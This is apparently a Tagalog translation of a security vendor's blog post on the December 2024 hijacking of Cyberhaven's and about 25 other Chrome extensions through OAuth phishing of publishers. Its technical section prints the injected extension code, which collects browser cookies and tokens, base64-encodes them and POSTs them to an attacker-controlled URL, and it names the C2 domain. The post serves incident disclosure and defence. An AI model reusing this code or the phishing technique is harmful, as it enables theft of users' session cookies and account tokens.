Mga Extension ng Browser sa Pag-target ng Attack Campaign: Ano ang Nangyari, Sino ang Naapektuhan, Paano Protektahan ang Iyong Sarili, at Paano Makakatulong ang LayerX (Mga Rolling Update)

Huling na-update: ika-30 ng Disyembre, 2024

Sinusubaybayan ng thread ng blog na ito ang lumalawak na kampanyang pandaigdigang pag-atake na nagta-target ng mga extension ng browser sa Chrome Web Store. Ia-update namin ang mga bagong detalye kapag naging available na ang mga ito.

Buod

Noong Disyembre 27, 2024, isiniwalat ng cybersecurity startup na Cyberhaven na nakompromiso ng isang pag-atake ang extension ng browser nito at nag-inject ng malisyosong code dito. Sa sandaling lumitaw ang mga detalye ng pag-atake na ito, ang mga karagdagang nakompromisong extension ng browser ay mabilis na natuklasan, na may higit sa 25 extension na kasalukuyang kilala na naapektuhan.

Ipinapaliwanag ng live na thread sa ibaba ang lahat ng detalyeng alam namin, kung aling mga extension ang naapektuhan, kung paano dapat protektahan ng mga organisasyon ang kanilang sarili, at kung paano tinutulungan ng LayerX ang mga customer nito na tugunan ang mga extension na nakompromiso ng pag-atakeng ito.

Mabilis na mga link sa loob ng dokumentong ito:

• Paano Natuklasan ang Pag-atake
• Paano Ginawa Ang Pag-atake
• Teknikal na Pagsusuri ng Pag-atake
• Mga Karagdagang Naapektuhang Extension
• Paano Protektahan ang Iyong Sarili
• Paano Tinutulungan ng LayerX ang Mga Customer na Protektahan ang Sarili nila
• Komplimentaryong Audit at Remediation ng Mga Nakompromisong Extension

Paano Natuklasan ang Pag-atake

Noong Disyembre 27, 2024, inabisuhan ng Cyberhaven ang mga customer nito tungkol sa isang paglabag sa seguridad na humantong sa kompromiso ng mga kredensyal ng isang empleyado ng Cyberhaven, na ginamit upang itulak ang isang nakakahamak na bersyon ng extension ng browser ng Cyberhaven sa Chrome Store. Ang Cyberhaven Security Extension ay kasalukuyang mayroong mahigit 400,000 user, na maaaring naapektuhan ng paglabag na ito.

Ang balita ng insidente ay unang ulat ng cybersecurity blog na Vulnu, na nakakuha ng kopya ng Cyberhaven't email sa mga customer.

Ayon sa pagsusuri ng Cyberhaven, noong Disyembre 24, nakompromiso ng isang phishing attack ang isa sa kanilang mga empleyado, na nagresulta sa pagkakaroon ng access ng mga attacker sa extension ng browser ng kumpanya sa Chrome Web Store.

Pagkatapos ay ginamit ng mga attacker ang access na ito upang mag-upload ng nakakahamak na bersyon ng extension ng browser ng Cyberhaven at na-update ito sa Chrome Store sa mga unang oras ng Disyembre 25.

Ayon sa Cyberhaven, ang nakakahamak na pag-update ay na-detect makalipas ang isang araw, at ang malisyosong code ay inalis sa mga unang oras ng Disyembre 26. Sa kabuuan, ang nakakahamak na bersyon ay online sa loob lamang ng higit sa 24 na oras.

Gayunpaman, nang magsimulang lumabas na ang mga karagdagang extension ay nakompromiso, naging maliwanag na ang pag-atake ng Cyberhaven ay hindi isang nakahiwalay na pag-atake na nagta-target lamang sa kumpanyang ito, ngunit sa halip ay bahagi ng isang malawak na kampanya. 

Ginagawa nitong may kaugnayan ang pagsusuri sa insidente ng Cyberhaven sa pag-unawa sa kampanya sa kabuuan.

Paano Ginawa ang Pag-atake

Nakompromiso ang admin account sa extension ng browser ng Cyberhaven sa pamamagitan ng naka-target na pag-atake sa phishing, na nagpapahintulot sa inatake na mag-publish ng nakakahamak na bersyon nito.

Dahil ang insidenteng ito ay hindi lamang isang one-off na pag-atake, ngunit bahagi ng isang kampanyang nagta-target ng maraming extension, naniniwala kami na ang phishing na diskarte na ginamit sa pag-atake sa Cyberhaven ay ginagaya rin kasama ng lahat ng iba pang extension.

Ang pinaka-malamang na pinagmumulan ng mga target para sa phishing campaign ay ang Chrome Web Store mismo.

Para sa bawat extension, nagbibigay ang Chrome Store ng mga detalye ng publisher ng extension, kasama ang isang email address sa pakikipag-ugnayan:

 

 

Mga halimbawang detalye ng contact ng extension ng browser ng Cyberhaven, mula sa Chrome Web Store

Gamit ang mga email address na ito, nagpadala ang mga attacker ng spoofed email na sinasabing sa ngalan ng Google, na nag-aalerto sa mga tatanggap ng 'mga paglabag' sa kanilang mga account.

Ito ay isang kopya ng phishing email na ipinadala sa Cyberhaven, na ibinigay ng kumpanya bilang bahagi ng kanilang teknikal na pagsusuri ng insidente:

 

Gayunpaman, ang katulad na email ay lumitaw mula sa iba pang mga mapagkukunan, pati na rin: a thread sa pangkat ng talakayan ng Chromium.org nagtanong tungkol sa isang kahina-hinalang email na natanggap nila mula sa Google, upang maunawaan kung ito ay isang pagtatangka sa phishing:

Ang email na ito ay halos magkapareho sa isa na nagkompromiso sa Cyberhaven (bagama't naglilista ng ibang dahilan ng 'paglabag'), na nagpapahiwatig na bahagi ito ng parehong kampanya sa phishing. Ayon sa post, natanggap ang email na ito noong Disyembre 23, sa mismong oras na nilabag ang Cyberhaven.

Sa sandaling na-click ng nilalayong target ang email na link, dinala sila sa isang form ng awtorisasyon ng Google upang magdagdag ng isang OAuth na application ng Google na pinangalanang "Mga Extension ng Patakaran sa Privacy."

Ang pagsunod sa daloy ng pag-apruba na ito ay hahantong sa pagpapahintulot sa malisyosong third-party na OAuth na application at pagbibigay dito ng access sa Chrome Web Store account ng biktima. Gayunpaman, dahil sa paraan kung saan ginawa ang pag-atake, hindi na kailangang ikompromiso ng mga umaatake ang mga kredensyal ng account mismo (ibig sabihin, ang password), 'piggyback' lang sa mga pahintulot na ibinigay ng nakakahamak na application.

Teknikal na Pagsusuri ng Pag-atake

Sa sandaling magkaroon ng access ang mga umaatake sa Web Store account ng biktima, nag-inject sila ng code sa worker.js file ng extension upang ma-access ang isang external na URL (cyberhavenext[.]pro) at mag-download ng external na configuration file.

Sa bawat oras na ilulunsad ang browser, kukuha ang extension ng configuration file mula sa isang malayuang server. Kinokontrol ng file na ito ang pag-uugali ng extension at maaaring dynamic na i-update ng umaatake, na nagpapahintulot sa kanila na magdikta Ano at kailan nagaganap ang mga aksyon. kaya ng umaatake ilipat ang configuration file anumang oras, na nagbibigay-daan sa kanila na iangkop ang pag-atake sa iba't ibang mga kapaligiran o mga target nang pabago-bago. Ito ang susi sa flexibility ng pag-atake.

Nasa ibaba ang isang halimbawa ng naturang code:

Mga pangunahing insight mula sa code:

1. Iniksyon sa Maramihang Mga Extension: Ang malisyosong code ay hindi limitado sa isang extension. Sa halip, na-inject ito sa maraming extension, na ang bawat extension ay kumukuha ng sarili nitong natatanging configuration file. Binibigyang-daan ng diskarteng ito ang umaatake na pag-iba-ibahin ang mga vector ng pag-atake, i-customize ang mga gawi para sa iba't ibang extension, at gawing mas mahirap ang pagtuklas.
2. Paulit-ulit na Pag-uugali: Nagaganap ang configuration fetch sa tuwing inilulunsad ang browser, na tinitiyak na palaging gumagana ang bawat extension kasama ang pinakabagong mga tagubiling ibinigay ng umaatake.
3. Mapanlinlang na Pangalan: Gumagamit ang code ng mga pangalan ng variable o attribute, gaya ng cyberhavenext_ext_manage, na naglalaman ng pangalan ng kumpanya. Ginagawa nitong mukhang lehitimo sa mga developer na sumusuri sa storage o code ng extension.
4. Pang-aabuso sa Lokal na Imbakan: Sa pamamagitan ng pag-iimbak ng data ng pagsasaayos sa chrome.storage.local, tinitiyak ng umaatake ang pagtitiyaga. Ang mga developer na nag-iinspeksyon sa data na ito ay maaaring magkamali sa pagtitiwala dito dahil sa paggamit ng pamilyar o kapani-paniwalang mga pangalan.
5. Dynamic na Kontrol: Ang endpoint (https://cyberhavenext.pro/ai-cyberhaven) ay nagbibigay-daan sa umaatake na baguhin ang mga configuration file para sa bawat extension anumang oras, na nagbibigay ng kumpletong kontrol sa functionality at gawi ng bawat nahawaang extension.
6. Mga Customized na Configuration: Ang bawat extension ay kumukuha ng natatanging configuration, na ginagawang mas mahirap i-generalize at matukoy ang malisyosong gawi. Ang diskarte na ito ay nagbibigay-daan sa mga iniangkop na pag-atake batay sa partikular na layunin ng extension o user base.

Bilang karagdagan, ang code ay nagdagdag ng bagong file (content.js) sa mga extension, na ginagamit upang mangolekta ng data ng user sa mga website at i-exfiltrate ito sa isang panlabas na website. Gumagana ang background script sa extension bilang isang sentral na controller, pinangangasiwaan ang mga papasok na mensahe mula sa mga script ng nilalaman at nagsasagawa ng iba't ibang pagkilos batay sa mga mensaheng iyon. Ang sumusunod na code snippet ay nagpapakita ng isang flexible na istraktura na naghihintay na magproseso ng maraming uri ng mga kahilingan:

chrome.runtime.onMessage.addListener(((t, e, a) => {
switch (t.action) {
case"cyberhavenext-completions":
fetch("<https://chatgpt.com/status/>", {
method: "POST",
headers: {"Content-Type": "application/json", Authorization: `Bearer ${t.key}`},
body: JSON.stringify({prompt: "check", max_tokens: 150})
}).then((t => t.json())).then((t => a(t))).catch((t => {
}));
break;
case"cyberhavenext-redirect":
fetch(t.url).then((t => t.redirected)).then((t => a(t))).catch();
break;
case"cyberhavenext-validate":
fetch(t.url, {
method: "POST",
headers: {
Accept: "application/json, application/xml, text/plain, text/html, *.*",
"Content-Type": "application/json"
},
body: JSON.stringify(t.pl)
}).then((t => t.json())).then((t => a(t))).catch((t => {
}));
break;
case"cyberhavenext-rtext":
fetch(t.url).then((t => t.text())).then((t => a(t))).catch();
break;
case"cyberhavenext-rjson":
fetch(t.url).then((t => t.json())).then((t => a(t))).catch();
break;
case"cyberhavenext-check-errors":
const e = t.pl;
let n = e.dm;
chrome.cookies.getAll({domain: n}, (n => {
if (n.length > 0) {
const o = n.map((t => ({
domain: t.domain,
expirationDate: t.expirationDate || null,
hostOnly: t.hostOnly,
httpOnly: t.httpOnly,
name: t.name,
path: t.path,
sameSite: t.sameSite || null,
secure: t.secure,
session: t.session,
storeId: t.storeId || null,
value: t.value
}))), c = e.n;
let s = "";
try {
s = btoa(JSON.stringify(e.openapi_u))
} catch (t) {
}
const i = e.openapi_tk + " || " + JSON.stringify(o) + " || " + btoa(navigator[c]) + " || " + e.uid + " || " + s + " || || " + e.k,
r = {ms1: btoa(i), ms2: JSON.stringify(e.cyberhavenext_cx), ms3: JSON.stringify(e.gpta)},
l = t.url;
fetch(l, {
method: "POST",
headers: {
Accept: "application/json, application/xml, text/plain, text/html, *.*",
"Content-Type": "application/json"
},
body: JSON.stringify(r)
}).then((t => t.json())).then((t => a(t))).catch((t => {
}))
}
}))
}
return !0
}))

Ginagamit ng script chrome.runtime.onMessage.addListener upang iproseso ang iba't ibang mga aksyon. Ang bawat aksyon ay tumutukoy sa isang partikular na pag-uugali, tulad ng paggawa ng mga kahilingan sa network.

Kapag ang “cyberhavenext-check-errors” ang aksyon ay hinihimok, kinukuha ng umaatake ang sensitibong cookies na ginagamit chrome.cookies.getAll pinagsasama rin ng umaatake ang data na ito sa iba pang impormasyon (tulad ng navigator[c] at e.uid) ikukubli ng umaatake ang nilalamang ginagamit btoa() para ma-convert ito sa base64. Ginagawa nitong hindi gaanong nababasa ang data sa mga tool sa pagsubaybay sa network, na nagdaragdag ng layer ng obfuscation.

Sa pamamagitan ng pag-embed ng mga pagkilos na ito sa background script, tinitiyak ng umaatake na:

• Ang nakakahamak na aktibidad ay hiwalay sa mga pakikipag-ugnayan ng user.
• Ito ay nangyayari nang tahimik sa background, na ginagawang mas mahirap na matukoy.

Ang pagsusuri na ginawa ng Cyberhaven sa mga nakalantad na endpoint ay nagpapahiwatig na ang nakakahamak na code ay partikular na nakatuon sa cookies at mga token sa pagpapatotoo para sa Facebook, at sa partikular - mga account sa negosyo sa Facebook:

Ayon sa Cyberhaven, kasama sa target na data ang mga Facebook access token, user ID, account information, at mga detalye ng Facebook Ads account.

Mga Karagdagang Naapektuhang Extension

Kapag natukoy na ang URL ng malisyosong C&C server, gumamit ang mga mananaliksik ng seguridad ng reverse DNS upang tukuyin ang mga karagdagang domain na nalutas sa parehong IP address. Ito ay humantong sa pagtuklas ng mga karagdagang nakompromisong extension ng browser at inihayag ang lawak ng kampanyang ito sa pag-atake.

Sa kasalukuyan, higit sa 25 mga extension ng browser, na may base sa pag-install na higit sa 2.3 milyong mga user, ay natagpuang nakompromiso:

• AI Assistant – ChatGPT at Gemini para sa Chrome
• AI Shop Buddy
• Bard AI chat
• Bookmark Favicon Changer
• Castorus
• ChatGPT Assistant – Matalinong Paghahanap
• Ang extension ng seguridad ng Cyberhaven V3
• Kumita – Hanggang 20% ​​Cash Back
• EmailHunter
• Buod ng GPT 4 kasama ang OpenAI
• GraphQL Network Inspector
• Internxt VPN
• Recorder ng Kasaysayan ng Keyboard
• Parrot Talks
• Praymus
• Mode ng Reader
• Rewards Search Automator
• Maghanap ng Copilot AI Assistant para sa Chrome
• Pagbukud-bukurin ayon sa Pinakamatanda
• Tackker – online keylogger tool
• TinaMind – Ang AI Assistant na pinapagana ng GPT-4o!
• Uvoice
• VidHelper – Video Downloader
• Vidnoz Flex – Recorder ng video at pagbabahagi ng Video
• Mga Visual na Epekto para sa Google Meet
• VPNCity
• Wayin AI

Paano Protektahan ang Iyong Sarili

Bagama't ang teknikal na pagsusuri sa ngayon ay nagpahiwatig na ang pangunahing layunin ng kampanyang ito ay ang pagnanakaw ng mga kredensyal sa Facebook at mga token ng pag-access, imposibleng ibukod ang pagkakalantad ng mga kredensyal ng mga karagdagang website.

Ito ang dahilan kung bakit inirerekomenda ng LayerX ang mga sumusunod na pagkilos para sa lahat ng naapektuhang user:

1. Alisin ang mga naapektuhang extension ng browser: tiyaking maaalis at/o ma-block ang lahat ng naapektuhang extension. Ang ilan sa mga extension ay nag-upload na ng mga na-update na bersyon na nag-alis ng nakakahamak na code, ngunit hindi lahat ng mga ito. Bukod dito, ang anumang mga nakompromisong extension na na-download na, ay mananatiling nakalantad hanggang sa i-update ng user ang bersyon ng extension. Ito ang dahilan kung bakit napakahalaga na aktibong huwag paganahin ang lahat ng potensyal na nakalantad na mga extension.
2. I-update ang lahat ng extension sa pinakabagong bersyon: kung sakaling may naibigay na pag-aayos ang publisher, mahalagang i-update ang naka-install na bersyon ng extension sa lalong madaling panahon (ipagpalagay na hindi pa ito naalis)
3. Tanggalin ang lahat ng cookies ng mga apektadong user: dahil ang pag-atake ay naka-target sa cookies at access token ng mga website, kinakailangang tanggalin ang lahat ng umiiral na cookies at i-refresh ang mga access token.
4. I-rotate ang mga password: bilang isang pinakamahusay na kasanayan, inirerekomenda rin na i-refresh ang lahat ng mga password ng mga apektadong user, upang matiyak na walang mga kredensyal sa pag-access ang naiwang nakompromiso.

Paano Tinutulungan ng LayerX ang Mga Customer Nito

1. Pagtuklas ng mga nakalantad na extension: mula nang malantad ang insidente sa Cyberhaven, ang mga mananaliksik ng seguridad sa buong mundo ay nagsusumikap upang tukuyin ang mga karagdagang nakompromisong extension. Ang LayerX ay naging aktibo sa pagsisikap na ito, na nakatuklas ng isang bilang ng mga naturang extension at pinagsama ito sa impormasyong magagamit sa publiko, pati na rin.
2. Pagtukoy ng mga nakakahamak na extension na naka-deploy sa mga network ng mga customer: Patuloy na ina-update ng LayerX ang mga listahan nito ng mga nakakahamak na extension upang isama ang mga extension na natuklasang nakompromiso ng paglabag na ito. Anumang oras na matuklasan ang naturang extension, agad na inaalertuhan ang mga customer. Bilang karagdagan, ang LayerX ay aktibong nakikipag-ugnayan sa mga apektadong customer upang alertuhan sila sa mga natuklasang ito.
3. Pag-deploy ng mga awtomatikong patakaran sa pagpapatupad: Na-update ng LayerX ang mga patakaran ng customer upang awtomatikong i-disable ang anumang kilalang nakompromisong extension.
4. Pagtanggal ng mga nakalantad na cookies ng mga user: sa kahilingan ng user, maaaring aktibong ipatupad ng LayerX ang pagtanggal ng cookies sa mga nakalantad na user, sa gayon ay nire-reset ang cookies at mga token sa pagpapatunay.
5. Pilitin ang pag-ikot ng password para sa mga nakalantad na user: Ang LayerX ay maaari ding mag-deploy ng mga patakaran sa seguridad upang pilitin ang pag-ikot ng mga password sa mga nakalantad na user, upang matiyak na walang mga kredensyal sa pag-access ang mananatiling nakalantad.

 

Komplimentaryong Audit at Remediation ng Mga Nakompromisong Extension

Dahil sa lawak at saklaw ng pag-atakeng ito, nag-aalok ang LayerX sa mga organisasyong naapektuhan ng pag-atakeng ito (o nag-aalala tungkol sa potensyal na maapektuhan) ng komplimentaryong pag-audit at remediation ng extension ng browser.

Kasama sa audit na ito ang:

• Pagtuklas ng lahat ng extension ng browser na naka-install sa iyong kapaligiran
• Pagma-map kung aling mga user ang may kung anong mga extension ang naka-install sa kanilang mga endpoint
• Detalyadong risk scoring ng bawat extension ng browser
• Pag-alis ng mga nakompromisong malisyosong extension ng browser
• Pag-ikot ng cookies at password ng user, kung kinakailangan

Pindutin dito upang mag-sign up para sa pagtatasa na ito.